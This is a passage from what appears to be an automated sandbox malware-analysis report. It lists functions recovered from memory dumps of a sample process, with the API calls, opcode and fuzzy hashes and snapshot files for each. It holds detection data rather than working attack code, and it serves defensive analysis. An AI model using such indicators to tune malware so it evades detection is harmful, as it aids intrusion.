                                            • Opcode Fuzzy Hash: a62f5b53de222f8c18719d4e3108363dbb71a4251dabff1b0110d0e4b6a00cb3
                                            • Instruction Fuzzy Hash: D52110B5D002099FCB14DFAAD844BEEFBF5FB88310F14842AE518A7250C778A944CFA1
                                            Function 06865E54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06867956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 8ebf38ec790acebeadf8d6a4cb8db89cca95565c54c437a79a0a1b6e90b03591
                                            • Instruction ID: cf4a6d4a1ffbfa0340642dd482faa205d8c5f4e1c33a4ec783c957667673ca1a
                                            • Opcode Fuzzy Hash: 8ebf38ec790acebeadf8d6a4cb8db89cca95565c54c437a79a0a1b6e90b03591
                                            • Instruction Fuzzy Hash: 801120B1C002498FDB10DF9AC444A9EFBF4EB48218F10842AE529B7200D379A545CFA0
                                            Function 068678EB Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06867956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 0a2441a4f0a9fe89fbef28e25ba098863df697c1a8b5b696abd0ebf67949efe3
                                            • Instruction ID: 600981918acc488b4d3040033a413bd92f494c9bacfb85334c5d228f0ba47b48
                                            • Opcode Fuzzy Hash: 0a2441a4f0a9fe89fbef28e25ba098863df697c1a8b5b696abd0ebf67949efe3
                                            • Instruction Fuzzy Hash: D0110FB6C002498FDB10DF9AC844ADEFBF4EB89228F14841AD969B7300D379A545CFA1
                                            Function 0686C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0686D89D), ref: 0686D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: a61757bcd234c6cd0e68be944d0ef279e8216216e1339f98c59f06ce3acbffa8
                                            • Instruction ID: 1ad75299d81c33a281411b30f7f743eee32e68dccea1bd372811ca6b4adf0bbc
                                            • Opcode Fuzzy Hash: a61757bcd234c6cd0e68be944d0ef279e8216216e1339f98c59f06ce3acbffa8
                                            • Instruction Fuzzy Hash: 501133B1900248CFCB10DF9AD444B9EFBF8EF48314F20841AE518A3250D379A944CFA0
                                            Function 0686DBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 1cd74cdd0b9de4e1ca37baf5aed9edfc3a1d6eed596a78ec8218cd4fd388488a
                                            • Instruction ID: b3e2dc6fce56650ded05cda83d5c8a75891ac7692c0d14dac7cd4ee65c533ec0
                                            • Opcode Fuzzy Hash: 1cd74cdd0b9de4e1ca37baf5aed9edfc3a1d6eed596a78ec8218cd4fd388488a
                                            • Instruction Fuzzy Hash: BD1145B58043488FDB20DF9AC948BDEBBF4EB48314F24841AE558A7300D379A544CFA5
                                            Function 0686DBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: bd3abf7894aec84242fb842e3de452d0b1950bdb26ca6c38653946024997ec87
                                            • Instruction ID: 0355fac74785d2cc56ef0ed392758bb22e23ea131e18afdf8fcf4770d3134a57
                                            • Opcode Fuzzy Hash: bd3abf7894aec84242fb842e3de452d0b1950bdb26ca6c38653946024997ec87
                                            • Instruction Fuzzy Hash: 8A1145B58043488FDB20DF9AC448BDEBBF4EB48314F10841AE519A3200D378A944CFA4
                                            Function 0686E189 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0686E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 749c7de420ccf9a0db497da785d19eb1c1fa58ac1beb4af34e9d4212c184a512
                                            • Instruction ID: 0aa7dc34446f3cbe30f47131922e2481214dfe0d2954f1853b4fa90aa60d619a
                                            • Opcode Fuzzy Hash: 749c7de420ccf9a0db497da785d19eb1c1fa58ac1beb4af34e9d4212c184a512
                                            • Instruction Fuzzy Hash: 6D1115B58042498FDB20DF9AD548BDEFFF8EB48324F14845AE559A3200D379A544CFA5
                                            Function 0686D8C0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0686D89D), ref: 0686D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 408d00f962f3c6b99a87607d7d881f6165b9fff7417d0d9c06057f4123112859
                                            • Instruction ID: 0dd04220dd244b61a0d972f7398eab3f1a0f7ec1275e55aa76a33c35fd15946a
                                            • Opcode Fuzzy Hash: 408d00f962f3c6b99a87607d7d881f6165b9fff7417d0d9c06057f4123112859
                                            • Instruction Fuzzy Hash: 341130B1900249CFDB10DF9AD589BDEFBF4EF48314F20845AE528A3610D378A944CFA0
                                            Function 0187EEC5 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 720badb42537ca036692c52c7556f1a838fefe0134c8801d0f553456bd63199a
                                            • Instruction ID: d2b1f7ebf3d3fad739de96fcd92b97d01a3c809fca338a76e2233747054fa070
                                            • Opcode Fuzzy Hash: 720badb42537ca036692c52c7556f1a838fefe0134c8801d0f553456bd63199a
                                            • Instruction Fuzzy Hash: 5D411231700202CFDB1A9B38D56466E7BE6AF89310F2448B8D006DB385DF35DE46CB91
                                            Function 018771E8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 487daddfd821748a8144f59e96e16c6f3fceafd9b8f3e343fa8201b9142a5b5f
                                            • Instruction ID: 149e2645ed238c0988cde0f36a17cffe0e34c6de05b4c2f12ec0ff1e18f9de99
                                            • Opcode Fuzzy Hash: 487daddfd821748a8144f59e96e16c6f3fceafd9b8f3e343fa8201b9142a5b5f
                                            • Instruction Fuzzy Hash: 84318371E202099FDB15CFA8C48979EB7B1EF85304F208529E816E7251E774DA41CB91
                                            Function 018771F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 728a1bdd65dfd84c5092a573d658aa43cf447aa6cf0a30fa34225ef0cd831175
                                            • Instruction ID: de8dd082d583ab52e053b5f8dc6ffc57ed49b1b9c33d6be412917ee90cec07f8
                                            • Opcode Fuzzy Hash: 728a1bdd65dfd84c5092a573d658aa43cf447aa6cf0a30fa34225ef0cd831175
                                            • Instruction Fuzzy Hash: 87317031E202099FDB15CFA8D44879EB7B2FF85314F208525F916E7251EB71EA41CB91
                                            Function 01876BA9 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 74711a3b7b9ad41ca8c7ec8103da7c6e7245b523378e76937667543caa174ac9
                                            • Instruction ID: ed016d4d749c452519d96e57d76c060124f53e0e7432ca9cfa45fb967781443c
                                            • Opcode Fuzzy Hash: 74711a3b7b9ad41ca8c7ec8103da7c6e7245b523378e76937667543caa174ac9
                                            • Instruction Fuzzy Hash: 7C0100327082009FC30AAB7DD42436E7BEAEF85310F1088AED00ACB355EF359942C792
                                            Function 01878E5C Relevance: .4, Instructions: 367COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96882249cd7759f2d2500d023edb423d82c0dcba44a938fb15aba9cf0bdd2f9f
                                            • Instruction ID: 1d915fa8b85b51a1656f9298774646f1d2d2ab23e986c2e3d84094f2ca1f1c94
                                            • Opcode Fuzzy Hash: 96882249cd7759f2d2500d023edb423d82c0dcba44a938fb15aba9cf0bdd2f9f
                                            • Instruction Fuzzy Hash: FCD1BE34F002059FDB15DBA8D584AADBBB6FF88324F248469E406E7395DB34DE42CB81
                                            Function 018791D8 Relevance: .4, Instructions: 357COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb7d3fd6723cbd1000fd3b825372bc3098e72c30d19e57196a37816b869c7c0f
                                            • Instruction ID: 0ecde47efa3c3eb5ecc5364183ef79c35ee1d75ced216b14ee2ac3d9755437c8
                                            • Opcode Fuzzy Hash: cb7d3fd6723cbd1000fd3b825372bc3098e72c30d19e57196a37816b869c7c0f
                                            • Instruction Fuzzy Hash: 01D1BD71E002058FDB14DFACD8807AEBBB6FB88324F20856AE919DB395D734D945CB91
                                            Function 01877780 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a62eefed1c4a55971b7efd243e56b0669a6178931400aa065621e23e5e57cbf
                                            • Instruction ID: 60fda21f658a1ca40fb34be0d916efcb975616fe9959f43f56aeb544717a6f01
                                            • Opcode Fuzzy Hash: 0a62eefed1c4a55971b7efd243e56b0669a6178931400aa065621e23e5e57cbf
                                            • Instruction Fuzzy Hash: 48B17531700601ABDB19AB2CE68862D77EAFBC9324F505979D405CB359CF3ADD46CB81
                                            Function 0187C5A0 Relevance: .3, Instructions: 269COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b23e1d3d6a4491082e63672481b512c5fd8760ad39003c8b0e0d229b4ed09e8
                                            • Instruction ID: 3a13b283b7941e88989153dccb07e29c7ba19c2768cb49df3cf5b204fbc579a1
                                            • Opcode Fuzzy Hash: 6b23e1d3d6a4491082e63672481b512c5fd8760ad39003c8b0e0d229b4ed09e8
                                            • Instruction Fuzzy Hash: 1C91E272E0052A8BDB15CB5DC8807BDF7B2EB84320F19C96AD455EB642C335EE85CB90
                                            Function 01874A9C Relevance: .3, Instructions: 262COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c492a42834643c0ca0bf0bde9f767b3cf8830bff7da79c38e7169997ce054816
                                            • Instruction ID: 85fd0f5c7369b4376977eb4f50fd30286f9fb1ee25d3279ea939acdef6ca2ab3
                                            • Opcode Fuzzy Hash: c492a42834643c0ca0bf0bde9f767b3cf8830bff7da79c38e7169997ce054816
                                            • Instruction Fuzzy Hash: 59B14970E002098FDB10CFA9C9857ADBFF2AF88318F148529D859E7294EB74D985CB91
                                            Function 01873E84 Relevance: .2, Instructions: 235COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a59bb1885a087865aeb04cac7fa0f75a596c961aa585fee11c39a13840df0b0
                                            • Instruction ID: fe3620a6a5f8305f277bccafc6c8beb7026f1c00888eb623ebf65d9ace1f91fc
                                            • Opcode Fuzzy Hash: 6a59bb1885a087865aeb04cac7fa0f75a596c961aa585fee11c39a13840df0b0
                                            • Instruction Fuzzy Hash: 2E916A70E00609DFDF11DFA9D9817ADBBF2BF88314F148129E819E7254EB349985CB92
                                            Function 01874814 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d2efd61003e049ee1dc15d740ea057e2ad5f7a7a091d76673b8a3887cf9e095
                                            • Instruction ID: ae39971eea65312414c232ca8e7c7d776c23d88d1f3daeb1c7e5db91b596baa8
                                            • Opcode Fuzzy Hash: 0d2efd61003e049ee1dc15d740ea057e2ad5f7a7a091d76673b8a3887cf9e095
                                            • Instruction Fuzzy Hash: 1A7149B0E002499FDB10DFA9C98579EFBF2AF88314F148129E419E7254EB749A41CB95
                                            Function 01874820 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8539c5e80ddada7d898c09e417507007e8f2c13c38042b36ee47bb28566662d3
                                            • Instruction ID: e5740a9b9111d0e717db91e43bd1ef5f95db9855b993ce8cdde1fc4877b07bf0
                                            • Opcode Fuzzy Hash: 8539c5e80ddada7d898c09e417507007e8f2c13c38042b36ee47bb28566662d3
                                            • Instruction Fuzzy Hash: 73714870E002499FDB14DFA9C9807AEFBF2AF88714F148129E419E7294EB749942CB95
                                            Function 01876CE6 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13b9f2e700f62ed850af91ccc554469d99cfe11495f8e6a5fff24a6f9d35a586
                                            • Instruction ID: ef0ba3ed628f2806d3b692e4090946e02c99748b519d3e8de3c0e22b1bd45d5b
                                            • Opcode Fuzzy Hash: 13b9f2e700f62ed850af91ccc554469d99cfe11495f8e6a5fff24a6f9d35a586
                                            • Instruction Fuzzy Hash: CD5135B1D106188FEB14CFA9C884B9DBBB1FF48314F288529E819BB350E774A944CF95
                                            Function 01876CF0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 728efe4be6c4b654a59ab33390af10b86f1e2db56b4d8ec87f9caab9da64bb90
                                            • Instruction ID: c1143814939555fbb2fc665710351a75724432080cad6202cec29f2de9d97313
                                            • Opcode Fuzzy Hash: 728efe4be6c4b654a59ab33390af10b86f1e2db56b4d8ec87f9caab9da64bb90
                                            • Instruction Fuzzy Hash: 9F512471D106188FEB14CFA9C884B9DBBB1FF48314F288529E819BB351E774A944CF95
                                            Function 0187112A Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eada2126a71d0b2dd17301a0e3694b055e7d1f80516e3a898ce13d3c28f5abe4
                                            • Instruction ID: b19f4b2fe4e0e767454a0c60a4b69384dbc47516a6dd56630adce39099d8f51f
                                            • Opcode Fuzzy Hash: eada2126a71d0b2dd17301a0e3694b055e7d1f80516e3a898ce13d3c28f5abe4
                                            • Instruction Fuzzy Hash: 73512C71202541AFCB1ADF28F9C096A3F6DFB5D304B00A9A9D0055B239DF3AAD09DF91
                                            Function 01871138 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 913a918ff0d1d0d178704edfe22abf7377cee65f37f6cc9b0b5be08263325705
                                            • Instruction ID: db4513300e42e51f6f5bf9a3e90309f43c90dcfcf36f3acf2a27365434a7dd5f
                                            • Opcode Fuzzy Hash: 913a918ff0d1d0d178704edfe22abf7377cee65f37f6cc9b0b5be08263325705
                                            • Instruction Fuzzy Hash: 2751ED70202541AFCB5ADF28F9C096A3F6DFB5D304B00A9A9D0055B239DF3AAD09DF91
                                            Function 018726EC Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 707f7a47bb7a5e42c24114918fbb4be36074c9aef7a09f6315f7fe807aaad9db
                                            • Instruction ID: fc5f12408de0393173220f2fe8180ab19c19f47c74e5b50f5b8fab458bff44cc
                                            • Opcode Fuzzy Hash: 707f7a47bb7a5e42c24114918fbb4be36074c9aef7a09f6315f7fe807aaad9db
                                            • Instruction Fuzzy Hash: B3411FB0D003489FDB10DFA9C580ADEBFF5FF48304F148029E819AB254DB75AA85CB90
                                            Function 0187ED88 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b87863cefc332ea26babdf7cb677829f59fa2c319e99c3ad87ec2a826147838e
                                            • Instruction ID: 6efeeca87db740453fec3a446a12e9743b15a7f431459adb22d2a38b9007272d
                                            • Opcode Fuzzy Hash: b87863cefc332ea26babdf7cb677829f59fa2c319e99c3ad87ec2a826147838e
                                            • Instruction Fuzzy Hash: 0F319035E146059BCF19CFA8D894A9EBBB2FF89300F108959E816E7350DB30ED42CB51
                                            Function 0187ED98 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fac62b6e495f64dbaf50547c2a29ca998e9d9b32e6880eee810a689fe30995d
                                            • Instruction ID: d8ba7bc68f606dbef5f7d52966201fd8921633b8072932fe9426357015d0f006
                                            • Opcode Fuzzy Hash: 3fac62b6e495f64dbaf50547c2a29ca998e9d9b32e6880eee810a689fe30995d
                                            • Instruction Fuzzy Hash: 23316035E142059BCB19CF69D494A9EBBF2FF89304F108959E816E7350DB70ED42CB51
                                            Function 018750A8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f95089158d9b4390b054b6f38cd6ee7e71af54994ae6f6c2c6ca649e5436efb7
                                            • Instruction ID: e994c4ec14554f2bf87ebc43fab5e20c93807639b01707a43fdaf161061ab6a8
                                            • Opcode Fuzzy Hash: f95089158d9b4390b054b6f38cd6ee7e71af54994ae6f6c2c6ca649e5436efb7
                                            • Instruction Fuzzy Hash: 07313A34600615DFDB25DB38D9946AE77B6AF88305F2104ADD806EB351DF3ADE01CBA1
                                            Function 018726F8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9c6333e49993ede6a56b5c68fe585bb8c6981a92b9a00be5c3426521409e3e6
                                            • Instruction ID: b8caeee32a92c6118f6088d1ced66034524371e7396154838715bf228b4f3a33
                                            • Opcode Fuzzy Hash: b9c6333e49993ede6a56b5c68fe585bb8c6981a92b9a00be5c3426521409e3e6
                                            • Instruction Fuzzy Hash: F941EEB0D003489FDB14DFA9C584ADEBFF5FF48314F248029E819AB254DB75AA85CB90
                                            Function 018750B8 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c0b1b8dc92aa3a083266103cda9c01d6d124bba1ba456e5de148ee03cf6d2cb
                                            • Instruction ID: 1309da28e416ffd5adc83de812a22795e80d81369a37f7739201d64bbfe2ad8f
                                            • Opcode Fuzzy Hash: 4c0b1b8dc92aa3a083266103cda9c01d6d124bba1ba456e5de148ee03cf6d2cb
                                            • Instruction Fuzzy Hash: B43149347006059FDB15DB28D9646AE77B6AF89305F2104ACD402EB394DF3ADE01CBA2
                                            Function 018716B0 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90e3b866aeda502a6279f313726f066e8eeaaff850b5143e582d0ba7f7327200
                                            • Instruction ID: be1552a7fa76c94ce0d9e89d58c0752f4530ee629b32376a24c421f570252e26
                                            • Opcode Fuzzy Hash: 90e3b866aeda502a6279f313726f066e8eeaaff850b5143e582d0ba7f7327200
                                            • Instruction Fuzzy Hash: 3D31D2746001414FDB22EB6CF888B69776DEB4D344F048A61D405CB66ADB3ADD49CF92
                                            Function 01878D49 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d9745e8d67b6b0739346087fa90d18a8f3e721ca934e9442133a76cc54d07e6
                                            • Instruction ID: a63d4bd988a1f9d807d7e8ffbc61c44c8ee49ec24d2065b00d154b1af46bd4dc
                                            • Opcode Fuzzy Hash: 0d9745e8d67b6b0739346087fa90d18a8f3e721ca934e9442133a76cc54d07e6
                                            • Instruction Fuzzy Hash: F431A571E0020A9BDB05CF68D88469EFBB2FF8A300F148616E815EB341DB70DD46CB90
                                            Function 01871380 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 346bf83fed810d15ac8318789a18080f785a4fd62323ae99733e6c90048597ea
                                            • Instruction ID: c936e4a59f94ba73033f4418316db048ea630b88aff9577f6457515af2213b90
